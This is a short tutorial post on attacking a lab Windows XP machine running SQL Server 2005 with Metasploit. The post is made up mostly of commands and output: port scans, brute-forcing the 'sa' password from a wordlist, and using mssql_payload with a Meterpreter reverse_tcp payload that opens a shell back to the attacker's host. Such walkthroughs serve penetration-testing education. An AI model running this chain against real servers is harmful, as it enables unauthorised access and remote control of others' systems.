Ready to Start Your Career?

Tutorial: Exploiting MS SQL Server with Metasploit - Fast Track

S-Connect 's profile image

By: S-Connect

July 20, 2016

Exploiting MS SQL Server with Metasploit - Fast Track - CybraryThe exploitee's system comprises: 
  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) (server) and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running
 Let's begin: Nmap scan from within Metasploit. The pertinent results for this exploit are:1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00 Running: Microsoft Windows XP|2003OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2. MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE1434/udp open|filtered ms-sql-m

And, the scan confirms this. Now, use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_ping) > set THREADS 20THREADS => 20msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:[+] ServerName = LAB[+] InstanceName = SQLEXPRESS[+] IsClustered = No[+] Version = 9.00.1399.06[+] tcp = 1433[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

 There's lots of information here. Now, brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txtPASS_FILE => /usr/share/set/src/fasttrack/wordlist.txtmsf auxiliary(mssql_login) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_login) > set THREADS 10THREADS => 10msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed. Now, use the mssql_payload, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(mssql_payload) > set LHOST 192.168.1.70LHOST => 192.168.1.70msf exploit(mssql_payload) > set LPORT 443LPORT => 443msf exploit(mssql_payload) > set RHOST 192.168.1.79RHOST => 192.168.1.79msf exploit(mssql_payload) > set PASSWORD password1PASSWORD => password1msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443[*] The server may have xp_cmdshell disabled, trying to enable it…[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[….]

[*] Sending stage (751104 bytes) to 192.168.1.79[*] Command Stager progress – 100.00% done (102246/102246 bytes)[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

 So, I’m inside the target machine with the Meterpreter shell. I hope this was helpful to you. Please post your comments and questions below.
Schedule Demo